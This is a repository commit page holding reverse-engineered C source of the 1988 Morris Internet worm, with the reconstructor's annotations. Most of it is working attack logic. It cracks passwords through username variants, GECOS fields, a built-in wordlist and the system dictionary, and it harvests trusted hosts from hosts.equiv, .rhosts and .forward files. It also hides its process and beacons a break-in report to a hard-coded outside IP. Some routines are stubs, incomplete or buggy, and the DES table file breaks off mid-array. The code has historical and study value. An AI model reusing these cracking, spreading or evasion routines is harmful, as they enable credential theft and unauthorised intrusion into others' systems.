brian/morris-worm
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

initial commit

Browse Source
This commit is contained in:
Brian
2025-11-06 10:18:00 -07:00
commit 6a2c0ee2d8
9 changed files with 3059 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

444
cracksome.c Normal file
View File

@@ -0,0 +1,444 @@
/* Dover */
#include "worm.h"
#include <stdio.h>
#include <ctype.h>
#include <strings.h>
#include <pwd.h>
int cmode;
extern struct hst *h_name2host();
struct usr { /* sizeof(usr) == 58 */
char *name, *o4, *o8, *o12;
char passwd[14]; /* offset 16 */
char decoded_passwd[14]; /* 30 */
short pad;
char *homedir; /* offset 46 */
char *gecos; /* offset 50 */
struct usr *next; /* offset 54 */
};
/* Ahhh, I just love these names. Don't change them for anything. */
static struct usr *x27f28, *x27f2c;
/* Crack some passwords. */
cracksome()
{
switch (cmode){
case 0:
strat_0();
return; /* 88 */
case 1:
strat_1();
return;
case 2:
try_words();
return;
case 3:
dict_words();
return;
}
}
/* Strategy 0, look through /etc/hosts.equiv, and /.rhost for new hosts */
strat_0() /* 0x5da4 */
{
FILE *hosteq;
char scanbuf[512];
char fwd_buf[256];
char *fwd_host;
char getbuf[256];
struct passwd *pwent;
char local[20];
struct usr *user;
struct hst *host; /* 1048 */
int check_other_cnt; /* 1052 */
static struct usr *user_list = NULL;
hosteq = fopen(XS("/etc/hosts.equiv"), XS("r"));
if (hosteq != NULL) { /* 292 */
while (fscanf(hosteq, XS("%.100s"), scanbuf)) {
host = h_name2host(scanbuf, 0);
if (host == 0) {
host = h_name2host(scanbuf, 1);
getaddrs(host);
}
if (host->o48[0] == 0) /* 158 */
continue;
host->flag |= 8;
}
fclose(hosteq); /* 280 */
}
hosteq = fopen(XS("/.rhosts"), XS("r"));
if (hosteq != NULL) { /* 516 */
while (fgets(getbuf, sizeof(getbuf), hosteq)) { /* 344,504 */
if (sscanf(getbuf, XS("%s"), scanbuf) != 1)
continue;
host = h_name2host(scanbuf, 0);
while (host == 0) { /* 436, 474 */
host = h_name2host(scanbuf, 1);
getaddrs(host);
}
if (host->o48[0] == 0)
continue;
host->flag |= 8;
}
fclose(hosteq);
}
/* look through the passwd file, checking for contact with others every
* tenth entry. */
setpwent();
check_other_cnt = 0; /* 522 */
while ((pwent = getpwent()) != 0) { /* 526, 1124 */
if ((check_other_cnt % 10) == 0)
other_sleep(0);
check_other_cnt++;
sprintf(fwd_buf, XS("%.200s/.forward"), pwent->pw_dir);
hosteq = fopen(fwd_buf, XS("r"));
if (hosteq != NULL) { /* 834 */
while (fgets(scanbuf, sizeof(scanbuf), hosteq)) { /* 650,822 */
/* Punt the newline */
(&scanbuf[strlen(scanbuf)])[-1] = '\0';
fwd_host = index(scanbuf, '@');
if (fwd_host == NULL)
continue;
host = h_name2host(++fwd_host, 0);
if (host == NULL) {
host = h_name2host(fwd_host, 1);
getaddrs(host);
}
if (host->o48[0] == 0)
continue;
host->flag |= 8;
}
fclose(hosteq);
}
/* Don't do foreign or compilcated hosts */
if (strlen(host->hostname) > 11)
continue;
user = (struct usr *)malloc(sizeof(struct usr));
strcpy(user->name, pwent->pw_name);
strcpy(&user->passwd[0], XS("x"));
user->decoded_passwd[0] = '\0';
user->homedir = strcpy(malloc(strlen(pwent->pw_dir)+1), pwent->pw_dir);
user->gecos = strcpy(malloc(strlen(pwent->pw_gecos)+1), pwent->pw_gecos
);
user->next = user_list;
user_list = user;
}
endpwent();
cmode = 1;
x27f2c = user_list;
return;
}
/* Check for 'username', 'usernameusername' and 'emanresu' as passwds. */
static strat_1() /* 0x61ca */
{
int cnt;
char usrname[50], buf[50];
for (cnt = 0; x27f2c && cnt < 50; x27f2c = x27f2c->next) { /* 1740 */
/* Every tenth time look for "me mates" */
if ((cnt % 10) == 0)
other_sleep(0);
/* Check for no passwd */
if (try_passwd(x27f2c, XS(""))) /* other_fd+84 */
continue; /* 1722 */
/* If the passwd is something like "*" punt matching it. */
if (strlen(x27f2c->passwd) != 13)
continue;
strncpy(usrname, x27f2c, sizeof(usrname)-1);
usrname[sizeof(usrname)-1] = '\0';
if (try_passwd(x27f2c, usrname))
continue;
sprintf(buf, XS("%.20s%.20s"), usrname, usrname);
if (try_passwd(x27f2c, buf))
continue; /* 1722 */
sscanf(x27f2c->gecos, XS("%[^ ,]"), buf);
if (isupper(buf[0]))
buf[0] = tolower(buf[0]);
if (strlen(buf) > 3 && try_passwd(x27f2c, buf))
continue;
buf[0] = '\0';
sscanf(x27f2c->gecos, XS("%*s %[^ ,]s"), buf);
if (isupper(buf[0]))
buf[0] = tolower(buf[0]);
if (strlen(buf) > 3 && index(buf, ',') == NULL &&
try_passwd(x27f2c, buf))
continue;
reverse_str(usrname, buf);
if (try_passwd(x27f2c, buf))
;
}
if (x27f2c == 0)
cmode = 2;
return;
}
static reverse_str(str1, str2) /* x642a */
char *str1, *str2;
{
int length, i;
length = strlen(str1);
for(i = 0; i < length; i++)
str2[i] = (&str1[length-i]) [-1];
str2[length] = '\0';
return;
}
static try_passwd(user, str) /* 0x6484, unchecked */
struct usr *user;
char *str;
{
if (strcmp(user->passwd, crypt(str, user->passwd)) == 0 ||
(str[0] == '\0' && user->passwd == '\0')) {
strncpy(user->decoded_passwd, str, sizeof(user->decoded_passwd));
user->decoded_passwd[sizeof(user->decoded_passwd)-1] = '\0';
attack_user(user);
return 1;
}
return 0;
}
/* Collect hostnames and run hueristic #1 for this user's .forward and .rhosts
*/
/* This is only called from try_passwd() */
static attack_user(user) /* 0x6514 */
struct usr *user;
{
FILE *fwd_fp;
char buf[512], *hostpart; /* l516 */
char rhbuf[256]; /* l776 */
char l1288[512];
struct hst *host; /* l1292 */
sprintf(buf, XS("%.200s/.forward"), user->homedir); /* <other_fd+11
5> */
fwd_fp = fopen(buf, XS("r"));
if (fwd_fp) {
while (fgets(buf, sizeof(buf), fwd_fp)) { /* 2088,2222 */
/* Punt the newline */
buf[strlen(buf) - 1] = '\0';
hostpart = index(buf, '@');
/* If no hostname, it's not foreign so ignore it. */
if (hostpart == NULL)
continue;
/* Split username and hostname */
*hostpart++ = '\0';
/* Here there appears to be a bug!!! It works correctly
* by coincidence of pushing things on the stack. */
#ifndef FIX_BUGS
host = h_name2host(hostpart, 1);
hu1(user, host, buf);
#else /* original */
/* 'hu1' should have another argument */
hu1(user, (host = h_name2host(hostpart, 1, buf)));
#endif
}
fclose(fwd_fp);
}
sprintf(buf, XS("%.200s/.rhosts"), user->homedir);
fwd_fp = fopen(buf, XS("r"));
if (fwd_fp) { /* 2446 */
while (fgets(rhbuf, sizeof(rhbuf), fwd_fp)) { /* 2312,2434 */
l1288[0] = '\0';
if (sscanf(rhbuf, XS("%s%s"), buf, l1288) < 1)
continue;
host = h_name2host(buf, 1);
hu1(user, host, l1288);
}
fclose(fwd_fp);
}
return;
}
/* This array in the sun binary was camaflouged by having the
high-order bit set in every char. */
char *wds[] = /* 0x21a74 */
{
"academia", "aerobics", "airplane", "albany",
"albatross", "albert", "alex", "alexander",
"algebra", "aliases", "alphabet", "amorphous",
"analog", "anchor", "andromache", "animals",
"answer", "anthropogenic", "anvils", "anything",
"aria", "ariadne", "arrow", "arthur",
"athena", "atmosphere", "aztecs", "azure",
"bacchus", "bailey", "banana", "bananas",
"bandit", "banks", "barber", "baritone",
"bass", "bassoon", "batman", "beater",
"beauty", "beethoven", "beloved", "benz",
"beowulf", "berkeley", "berliner", "beryl",
"beverly", "bicameral", "brenda", "brian",
"bridget", "broadway", "bumbling", "burgess",
"campanile", "cantor", "cardinal", "carmen",
"carolina", "caroline", "cascades", "castle",
"cayuga", "celtics", "cerulean", "change",
"charles", "charming", "charon", "chester",
"cigar", "classic", "clusters", "coffee",
"coke", "collins", "commrades", "computer",
"condo", "cookie", "cooper", "cornelius",
"couscous", "creation", "creosote", "cretin",
"daemon", "dancer", "daniel", "danny",
"dave", "december", "defoe", "deluge",
"desperate", "develop", "dieter", "digital",
"discovery", "disney", "drought", "duncan",
"eager", "easier", "edges", "edinburgh",
"edwin", "edwina", "egghead", "eiderdown",
"eileen", "einstein", "elephant", "elizabeth",
"ellen", "emerald", "engine", "engineer",
"enterprise", "enzyme", "ersatz", "establish",
"estate", "euclid", "evelyn", "extension",
"fairway", "felicia", "fender", "fermat",
"fidelity", "finite", "fishers", "flakes",
"float", "flower", "flowers", "foolproof",
"football", "foresight", "format", "forsythe",
"fourier", "fred", "friend", "frighten",
"fungible", "gabriel", "gardner", "garfield",
"gauss", "george", "gertrude", "ginger",
"glacier", "golfer", "gorgeous", "gorges",
"gosling", "gouge", "graham", "gryphon",
"guest", "guitar", "gumption", "guntis",
"hacker", "hamlet", "handily", "happening",
"harmony", "harold", "harvey", "hebrides",
"heinlein", "hello", "help", "herbert",
"hiawatha", "hibernia", "honey", "horse",
"horus", "hutchins", "imbroglio", "imperial",
"include", "ingres", "inna", "innocuous",
"irishman", "isis", "japan", "jessica",
"jester", "jixian", "johnny", "joseph",
"joshua", "judith", "juggle", "julia",
"kathleen", "kermit", "kernel", "kirkland",
"knight", "ladle", "lambda", "lamination",
"larkin", "larry", "lazarus", "lebesgue",
"leland", "leroy", "lewis", "light",
"lisa", "louis", "lynne", "macintosh",
"mack", "maggot", "magic", "malcolm",
"mark", "markus", "marty", "marvin",
"master", "maurice", "mellon", "merlin",
"mets", "michael", "michelle", "mike",
"minimum", "minsky", "moguls", "moose",
"morley", "mozart", "nancy", "napoleon",
"nepenthe", "ness", "network", "newton",
"next", "noxious", "nutrition", "nyquist",
"oceanography", "ocelot", "olivetti", "olivia",
"oracle", "orca", "orwell", "osiris",
"outlaw", "oxford", "pacific", "painless",
"pakistan", "papers", "password", "patricia",
"penguin", "peoria", "percolate", "persimmon",
"persona", "pete", "peter", "philip",
"phoenix", "pierre", "pizza", "plover",
"plymouth", "polynomial", "pondering", "pork",
"poster", "praise", "precious", "prelude",
"prince", "princeton", "protect", "protozoa",
"pumpkin", "puneet", "puppet", "rabbit",
"rachmaninoff", "rainbow", "raindrop", "raleigh",
"random", "rascal", "really", "rebecca",
"remote", "rick", "ripple", "robotics",
"rochester", "rolex", "romano", "ronald",
"rosebud", "rosemary", "roses", "ruben",
"rules", "ruth", "saxon", "scamper",
"scheme", "scott", "scotty", "secret",
"sensor", "serenity", "sharks", "sharon",
"sheffield", "sheldon", "shiva", "shivers",
"shuttle", "signature", "simon", "simple",
"singer", "single", "smile", "smiles",
"smooch", "smother", "snatch", "snoopy",
"soap", "socrates", "sossina", "sparrows",
"spit", "spring", "springer", "squires",
"strangle", "stratford", "stuttgart", "subway",
"success", "summer", "super", "superstage",
"support", "supported", "surfer", "suzanne",
"swearer", "symmetry", "tangerine", "tape",
"target", "tarragon", "taylor", "telephone",
"temptation", "thailand", "tiger", "toggle",
"tomato", "topography", "tortoise", "toyota",
"trails", "trivial", "trombone", "tubas",
"tuttle", "umesh", "unhappy", "unicorn",
"unknown", "urchin", "utility", "vasant",
"vertigo", "vicky", "village", "virginia",
"warren", "water", "weenie", "whatnot",
"whiting", "whitney", "will", "william",
"williamsburg", "willie", "winston", "wisconsin",
"wizard", "wombat", "woodwind", "wormwood",
"yacov", "yang", "yellowstone", "yosemite",
"zimmerman",
0
};
int nextw = 0; /* 0x24868 */
/* Try a list of potential passwds for each user. */
static try_words() /* 0x66da */
{
struct usr *user;
int i, j;
if (wds[nextw] == 0) {
cmode++;
return; /* 2724 */
}
if (nextw == 0) { /* 2550 */
for (i = 0; wds[i]; i++)
;
permute(wds, i, sizeof(wds[0]));
}
for (j = 0; wds[nextw][j] != '\0'; j++)
wds[nextw][j] &= 0x7f;
for (user = x27f28; user; user = user->next)
try_passwd(user, wds[nextw]);
for (j = 0; wds[nextw][j]; j++) /* 2664,2718 */
wds[nextw][j] |= 0x80;
nextw += 1;
return;
}
/* Called only from the cracksome() dispatch loop. Tries a single word from th
e
* dictionary, downcasing if capitalized and trying again. */
static dict_words() /* 0x67f0 */
{
char buf[512];
struct usr *user;
static FILE *x27f30;
if (x27f30 != NULL) {
x27f30 = fopen(XS("/usr/dict/words"), XS("r"));
if (x27f30 == NULL)
return;
}
if (fgets(buf, sizeof(buf), x27f30) == 0) { /* 2808,2846 */
cmode++;
return;
}
(&buf[strlen(buf)])[-1] = '\0';
for (user = x27f28; user; user = user->next) /* 2910 */
try_passwd(user, buf);
if (!isupper(buf[0]))
return;
buf[0] = tolower(buf[0]);
for (user = x27f28; user; user = user->next)
try_passwd(user, buf);
return; /* 2988 */
}
/*
* Local variables:
* comment-column: 48
* compile-command: "cc -S cracksome.c"
* End:
*/

1367
hs.c Normal file
View File

File diff suppressed because it is too large Load Diff

22
makefile Normal file
View File

@@ -0,0 +1,22 @@
C_FILES = worm.c net.c hs.c cracksome.c stubs.c
H_FILES = worm.h
OFILES = worm.o net.o hs.o cracksome.o stubs.o
# Luckily, the original used no optimization
CFLAGS =
# Most sites will have to remove the "-D" -- send for our souped-up version
# of ctags becker@trantor.harris-atd.com
TAGS_FLAGS = -xDt
test: $(OFILES)
$(CC) -o test $(OFILES)
$(OFILES): worm.h
clean:
rm -f *.o *~ *.bak
tags:
ctags -xDt > tags
tar:
tar -cf foo.tar description Makefile $(C_FILES) $(H_FILES) x8113550.c

116
net.c Normal file
View File

@@ -0,0 +1,116 @@
/* dover */
#include "worm.h"
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <net/if.h>
/* This is the second of five source files linked together to form the '.o'
* file distributed with the worm.
*/
if_init() /* 0x254c, check again */
{
struct ifconf if_conf;
struct ifreq if_buffer[12];
int s, i, num_ifs, j;
char local[48];
nifs = 0;
s = socket(AF_INET, SOCK_STREAM, 0);
if (s < 0)
return 0; /* if_init+1042 */
if_conf.ifc_req = if_buffer;
if_conf.ifc_len = sizeof(if_buffer);
if (ioctl(s, SIOCGIFCONF, &if_conf) < 0) {
close(s);
return 0; /* if_init+1042 */
}
num_ifs = if_conf.ifc_len/sizeof(if_buffer[0]);
for(i = 0; i < num_ifs; i++) { /* if_init+144 */
for (j = 0; j < nifs; j++)
/* Oops, look again. This line needs verified. */
if (strcmp(ifs[j], if_buffer[i].ifr_name) == 0)
break;
}
}
/* Yes all of these are in the include file, but why bother? Everyone knows
netmasks, and they will never change... */
def_netmask(net_addr) /* 0x2962 */
int net_addr;
{
if ((net_addr & 0x80000000) == 0)
return 0xFF000000;
if ((net_addr & 0xC0000000) == 0xC0000000)
return 0xFFFF0000;
return 0xFFFFFF00;
}
netmaskfor(addr) /* 0x29aa */
int addr;
{
int i, mask;
mask = def_netmask(addr);
for (i = 0; i < nifs; i++)
if ((addr & mask) == (ifs[i].if_l16 & mask))
return ifs[i].if_l24;
return mask;
}
rt_init() /* 0x2a26 */
{
FILE *pipe;
char input_buf[64];
int l204, l304;
ngateways = 0;
pipe = popen(XS("/usr/ucb/netstat -r -n"), XS("r"));
/* &env102,&env 125 */
if (pipe == 0)
return 0;
while (fgets(input_buf, sizeof(input_buf), pipe)) { /* to 518 */
other_sleep(0);
if (ngateways >= 500)
break;
sscanf(input_buf, XS("%s%s"), l204, l304); /* <env+127>"%s%s" */
/* other stuff, I'll come back to this later */
} /* 518, back to 76 */
pclose(pipe);
rt_init_plus_544();
return 1;
} /* 540 */
static rt_init_plus_544() /* 0x2c44 */
{
}
getaddrs() /* 0x2e1a */
{
}
struct bar *a2in(a) /* 0x2f4a, needs to be fixed */
int a;
{
static struct bar local;
local.baz = a;
return &local;
}
/* End of source file in original. */
/*
* Local variables:
* compile-command: "cc -S net.c"
* comment-column: 48
* End:
*/

25
stubs.c Normal file
View File

@@ -0,0 +1,25 @@
/* dover */
/* The version of crypt() used in the worm program has the same tables as
* Berkeley's 4.3 crypt(), but uses different code. Since I don't know where
* we put our 4.2 tape I can't check it against that code to find the exact
* source. I assume that it just a regualar crypt() routine with several
* interior functions declared static, perhaps tuned somewhat for speed on the
* VAX and Sun.
*/
crypt()
{ }
/* These might not be copyrighted, but I'm not taking the chance. They are
obvious. */
h_addr2host()
{}
h_name2host()
{}
/*
* Local variables:
* compile-command: "make test"
* comment-column: 48
* End:
*/

174
worm.c Normal file
View File

@@ -0,0 +1,174 @@
/* dover */
#include "worm.h"
#include <stdio.h>
#include <signal.h>
#include <strings.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/fcntl.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <net/if.h>
#include <arpa/inet.h>
extern errno;
extern char *malloc();
int pleasequit; /* See worm.h */
int nobjects = 0;
int nextw;
char *null_auth;
object objects[69]; /* Don't know how many... */
object *getobjectbyname();
char *XS();
main(argc, argv) /* 0x20a0 */
int argc;
char **argv;
{
int i, l8, pid_arg, j, cur_arg, unused;
long key; /* -28(fp) */
struct rlimit rl;
l8 = 0; /* Unused */
strcpy(argv[0], XS("sh")); /* <env+52> */
time(&key);
srandom(key);
rl.rlim_cur = 0;
rl.rlim_max = 0;
if (setrlimit(RLIMIT_CORE, &rl))
;
signal(SIGPIPE, SIG_IGN);
pid_arg = 0;
cur_arg = 1;
if (argc > 2 &&
strcmp(argv[cur_arg], XS("-p")) == 0) { /* env55 == "-p" */
pid_arg = atoi(argv[2]);
cur_arg += 2;
}
for(i = cur_arg; i < argc; i++) { /* otherwise <main+286> */
if (loadobject(argv[i]) == 0)
exit(1);
if (pid_arg)
unlink(argv[i]);
}
if ((nobjects < 1) || (getobjectbyname(XS("l1.c")) == NULL))
exit(1);
if (pid_arg) {
for(i = 0; i < 32; i++)
close(i);
unlink(argv[0]);
unlink(XS("sh")); /* <env+63> */
unlink(XS("/tmp/.dumb")); /* <env+66>"/tmp/.dumb"
*/
}
for (i = 1; i < argc; i++)
for (j = 0; argv[i][j]; j++)
argv[i][j] = '\0';
if (if_init() == 0)
exit(1);
if (pid_arg) { /* main+600 */
if (pid_arg == getpgrp(getpid()))
setpgrp(getpid(), getpid());
kill(pid_arg, 9);
}
mainloop();
}
static mainloop() /* 0x2302 */
{
long key, time1, time0;
time(&key);
srandom(key);
time0 = key;
if (hg() == 0 && hl() == 0)
ha();
checkother();
report_breakin();
cracksome();
other_sleep(30);
while (1) {
/* Crack some passwords */
cracksome();
/* Change my process id */
if (fork() > 0)
exit(0);
if (hg() == 0 && hi() == 0 && ha() == 0)
hl();
other_sleep(120);
time(&time1);
if (time1 - time0 >= 60*60*12)
h_clean();
if (pleasequit && nextw > 0)
exit(0);
}
}
static trans_cnt;
static char trans_buf[NCARGS];
char *XS(str1) /* 0x23fc */
char *str1;
{
int i, len;
char *newstr;
#ifndef ENCYPHERED_STRINGS
return str1;
#else
len = strlen(str1);
if (len + 1 > NCARGS - trans_cnt)
trans_cnt = 0;
newstr = &trans_buf[trans_cnt];
trans_cnt += 1 + len;
for (i = 0; str1[i]; i++)
newstr[i] = str1[i]^0x81;
newstr[i] = '\0';
return newstr;
#endif
}
/* This report a sucessful breakin by sending a single byte to "128.32.137.13"
* (whoever that is). */
static report_breakin(arg1, arg2) /* 0x2494 */
{
int s;
struct sockaddr_in sin;
char msg;
if (7 != random() % 15)
return;
bzero(&sin, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = REPORT_PORT;
sin.sin_addr.s_addr = inet_addr(XS("128.32.137.13"));
/* <env+77>"128.32.137.13" */
s = socket(AF_INET, SOCK_STREAM, 0);
if (s < 0)
return;
if (sendto(s, &msg, 1, 0, &sin, sizeof(sin)))
;
close(s);
}
/* End of first file in the original source.
* (Indicated by extra zero word in text area.) */
/*
* Local variables:
* compile-command: "make"
* comment-column: 48
* End:
*/

53
worm.h Normal file
View File

@@ -0,0 +1,53 @@
/* Magic numbers the program uses to identify other copies of itself. */
#define REPORT_PORT 0x2c5d
#define MAGIC_1 0x00148898
#define MAGIC_2 0x00874697
extern int pleasequit; /* This stops the program after one
* complete pass if set. It is incremented
* inside of checkother if contact with another
* happens. */
/* There are pieces of "stub" code, presumably from something like this to
get rid of error messages */
#define error()
/* This appears to be a structure unique to this program. It doesn't seem that
* the blank slots are really an array of characters for the hostname, but
* maybe they are.
*/
struct hst {
char *hostname;
int l4, l8, l12, l16, l20, l24, o28, o32, o36, o40, o44;
int o48[6]; /* used */
int flag; /* used */
#define HST_HOSTEQUIV 8
#define HST_HOSTFOUR 4
#define HST_HOSTTWO 2
struct hst *next; /* o76 */
};
typedef struct {
char *name;
unsigned long size;
char *buf;
} object;
extern struct ifses {
int if_l0, if_l4, if_l8, if_l12; /* unused */
int if_l16; /* used */
int if_l20; /* unused */
int if_l24; /* used */
short if_l28; /* unused */
} ifs[];
extern nifs;
extern int ngateways;
extern object objects[], *getobjectbyname();
extern int nobjects;
/* Only used for a2in(). Why? I don't know. */
struct bar {int baz;};
extern struct bar *a2in();

758
wormdes.c Normal file
View File

@@ -0,0 +1,758 @@
/* INTERNET WORM CRYPT() ROUTINE
notes from 'Password Cracking: A Game of Wits' by Donn Seeley CACM,
June89 v32n6 pp700-703 : The Worm's crypt algorithm appears to be a
compramise between time and space: the time needed to encrypt one
password guess verses the substantial extra table space needed to
squeeze performance out of the algorithm...The traditional UNIX
algorithm stores each bit of the password in a byte, while the worms
algorithm packs packs the bits into into two 32-bit words. This
permits the worms algorithm to use bitfield and shift operations on
the password data. (also saves a little space!)
Other speedups include unrolling loops, combining tables,
precomputing shifts and masks, and eliminating redundant initial and
final permutations when performing the 25 applications of modified
DES that the password encryption algorithm uses.
The biggest performance improvement comes from combining
permutations: the worm uses expanded arrays which are indexed by
groups of bits rather than single bits.
Bishops DESZIP.c does all these things and also precomputes more
functions yielding twice the performance of the worms algorithm, but
requiring nearly 200KB of initialized data as opposed to the 6KB
used by the worm, and the less than 2KB used by the normal crypt().
The worms version of crypt ran 9 times faster than the normal crypt
while DESZIP runs about 20 time faster (FDES + DESZIP are about
equivalent). on a VAX 6800 encrypting 271 passwords it took the worms
crypt less than 6 seconds or 45 passwords per sec, and the normal
crypt took 54 seconds or 5 passwords per second. - Tangent */
static char e[48] = { /* 0x20404 */
31, 0, 1, 2, 3, 4, 3, 4,
5, 6, 7, 8, 7, 8, 9, 10,
11, 12, 11, 12, 13, 14, 15, 16,
15, 16, 17, 18, 19, 20, 19, 20,
21, 22, 23, 24, 23, 24, 25, 26,
27, 28, 27, 28, 29, 30, 31, 0,
};
int shift[16] = { /* 0x20434 */
1,1,2,2, 2,2,2,2, 1,2,2,2, 2,2,2,1,
};
int ip_L0[] = {
0x00000008, 0x00000008, 0x08000808, 0x08000808,
0x00000008, 0x00000008, 0x08000808, 0x08000808,};
int ip_L1[] = {
0x00000000, 0x00080000, 0x00000000, 0x00080000,
0x08000000, 0x08080000, 0x08000000, 0x08080000,
0x00000000, 0x00080000, 0x00000000, 0x00080000,
0x08000000, 0x08080000, 0x08000000, 0x08080000,};
int ip_L2[] = {
0x00000004, 0x00000004, 0x04000404, 0x04000404,
0x00000004, 0x00000004, 0x04000404, 0x04000404,};
int ip_L3[] = {
0x00000000, 0x00040000, 0x00000000, 0x00040000,
0x04000000, 0x04040000, 0x04000000, 0x04040000,
0x00000000, 0x00040000, 0x00000000, 0x00040000,
0x04000000, 0x04040000, 0x04000000, 0x04040000,};
int ip_L4[] = {
0x00000002, 0x00000002, 0x02000202, 0x02000202,
0x00000002, 0x00000002, 0x02000202, 0x02000202,};
int ip_L5[] = {
0x00000000, 0x00020000, 0x00000000, 0x00020000,
0x02000000, 0x02020000, 0x02000000, 0x02020000,
0x00000000, 0x00020000, 0x00000000, 0x00020000,
0x02000000, 0x02020000, 0x02000000, 0x02020000,};
int ip_L6[] = {
0x00000001, 0x00000001, 0x01000101, 0x01000101,
0x00000001, 0x00000001, 0x01000101, 0x01000101,};
int ip_L7[] = {
0x00000000, 0x00010000, 0x00000000, 0x00010000,
0x01000000, 0x01010000, 0x01000000, 0x01010000,
0x00000000, 0x00010000, 0x00000000, 0x00010000,
0x01000000, 0x01010000, 0x01000000, 0x01010000,};
int ip_L8[] = {
0x00000080, 0x00000080, 0x80008080, 0x80008080,
0x00000080, 0x00000080, 0x80008080, 0x80008080,};
int ip_L9[] = {
0x00000000, 0x00800000, 0x00000000, 0x00800000,
0x80000000, 0x80800000, 0x80000000, 0x80800000,
0x00000000, 0x00800000, 0x00000000, 0x00800000,
0x80000000, 0x80800000, 0x80000000, 0x80800000,};
int ip_La[] = {
0x00000040, 0x00000040, 0x40004040, 0x40004040,
0x00000040, 0x00000040, 0x40004040, 0x40004040,};
int ip_Lb[] = {
0x00000000, 0x00400000, 0x00000000, 0x00400000,
0x40000000, 0x40400000, 0x40000000, 0x40400000,
0x00000000, 0x00400000, 0x00000000, 0x00400000,
0x40000000, 0x40400000, 0x40000000, 0x40400000,};
int ip_Lc[] = {
0x00000020, 0x00000020, 0x20002020, 0x20002020,
0x00000020, 0x00000020, 0x20002020, 0x20002020,};
int ip_Ld[] = {
0x00000000, 0x00200000, 0x00000000, 0x00200000,
0x20000000, 0x20200000, 0x20000000, 0x20200000,
0x00000000, 0x00200000, 0x00000000, 0x00200000,
0x20000000, 0x20200000, 0x20000000, 0x20200000,};
int ip_Le[] = {
0x00000010, 0x00000010, 0x10001010, 0x10001010,
0x00000010, 0x00000010, 0x10001010, 0x10001010,};
int ip_Lf[] = {
0x00000000, 0x00100000, 0x00000000, 0x00100000,
0x10000000, 0x10100000, 0x10000000, 0x10100000,
0x00000000, 0x00100000, 0x00000000, 0x00100000,
0x10000000, 0x10100000, 0x10000000, 0x10100000,};
int ip_H0[] = {
0x00000000, 0x00080008, 0x00000000, 0x00080008,
0x08000800, 0x08080808, 0x08000800, 0x08080808,};
int ip_H1[] = {
0x00000000, 0x00000000, 0x00080000, 0x00080000,
0x00000000, 0x00000000, 0x00080000, 0x00080000,
0x08000000, 0x08000000, 0x08080000, 0x08080000,
0x08000000, 0x08000000, 0x08080000, 0x08080000,};
int ip_H2[] = {
0x00000000, 0x00040004, 0x00000000, 0x00040004,
0x04000400, 0x04040404, 0x04000400, 0x04040404,};
int ip_H3[] = {
0x00000000, 0x00000000, 0x00040000, 0x00040000,
0x00000000, 0x00000000, 0x00040000, 0x00040000,
0x04000000, 0x04000000, 0x04040000, 0x04040000,
0x04000000, 0x04000000, 0x04040000, 0x04040000,};
int ip_H4[] = {
0x00000000, 0x00020002, 0x00000000, 0x00020002,
0x02000200, 0x02020202, 0x02000200, 0x02020202,};
int ip_H5[] = {
0x00000000, 0x00000000, 0x00020000, 0x00020000,
0x00000000, 0x00000000, 0x00020000, 0x00020000,
0x02000000, 0x02000000, 0x02020000, 0x02020000,
0x02000000, 0x02000000, 0x02020000, 0x02020000,};
int ip_H6[] = {
0x00000000, 0x00010001, 0x00000000, 0x00010001,
0x01000100, 0x01010101, 0x01000100, 0x01010101,};
int ip_H7[] = {
0x00000000, 0x00000000, 0x00010000, 0x00010000,
0x00000000, 0x00000000, 0x00010000, 0x00010000,
0x01000000, 0x01000000, 0x01010000, 0x01010000,
0x01000000, 0x01000000, 0x01010000, 0x01010000,};
int ip_H8[] = {
0x00000000, 0x00800080, 0x00000000, 0x00800080,
0x80008000, 0x80808080, 0x80008000, 0x80808080,};
int ip_H9[] = {
0x00000000, 0x00000000, 0x00800000, 0x00800000,
0x00000000, 0x00000000, 0x00800000, 0x00800000,
0x80000000, 0x80000000, 0x80800000, 0x80800000,
0x80000000, 0x80000000, 0x80800000, 0x80800000,};
int ip_Ha[] = {
0x00000000, 0x00400040, 0x00000000, 0x00400040,
0x40004000, 0x40404040, 0x40004000, 0x40404040,};
int ip_Hb[] = {
0x00000000, 0x00000000, 0x00400000, 0x00400000,
0x00000000, 0x00000000, 0x00400000, 0x00400000,
0x40000000, 0x40000000, 0x40400000, 0x40400000,
0x40000000, 0x40000000, 0x40400000, 0x40400000,};
int ip_Hc[] = {
0x00000000, 0x00200020, 0x00000000, 0x00200020,
0x20002000, 0x20202020, 0x20002000, 0x20202020,};
int ip_Hd[] = {
0x00000000, 0x00000000, 0x00200000, 0x00200000,
0x00000000, 0x00000000, 0x00200000, 0x00200000,
0x20000000, 0x20000000, 0x20200000, 0x20200000,
0x20000000, 0x20000000, 0x20200000, 0x20200000,};
int ip_He[] = {
0x00000000, 0x00100010, 0x00000000, 0x00100010,
0x10001000, 0x10101010, 0x10001000, 0x10101010,};
int ip_Hf[] = {
0x00000000, 0x00000000, 0x00100000, 0x00100000,
0x00000000, 0x00000000, 0x00100000, 0x00100000,
0x10000000, 0x10000000, 0x10100000, 0x10100000,
0x10000000, 0x10000000, 0x10100000, 0x10100000,};
int ipi_L0[] = {
0x00000000, 0x01000000, 0x00010000, 0x01010000,
0x00000100, 0x01000100, 0x00010100, 0x01010100,
0x00000001, 0x01000001, 0x00010001, 0x01010001,
0x00000101, 0x01000101, 0x00010101, 0x01010101,};
int ipi_L2[] = {
0x00000000, 0x04000000, 0x00040000, 0x04040000,
0x00000400, 0x04000400, 0x00040400, 0x04040400,
0x00000004, 0x04000004, 0x00040004, 0x04040004,
0x00000404, 0x04000404, 0x00040404, 0x04040404,};
int ipi_L4[] = {
0x00000000, 0x10000000, 0x00100000, 0x10100000,
0x00001000, 0x10001000, 0x00101000, 0x10101000,
0x00000010, 0x10000010, 0x00100010, 0x10100010,
0x00001010, 0x10001010, 0x00101010, 0x10101010,};
int ipi_L6[] = {
0x00000000, 0x40000000, 0x00400000, 0x40400000,
0x00004000, 0x40004000, 0x00404000, 0x40404000,
0x00000040, 0x40000040, 0x00400040, 0x40400040,
0x00004040, 0x40004040, 0x00404040, 0x40404040,};
int ipi_L8[] = {
0x00000000, 0x02000000, 0x00020000, 0x02020000,
0x00000200, 0x02000200, 0x00020200, 0x02020200,
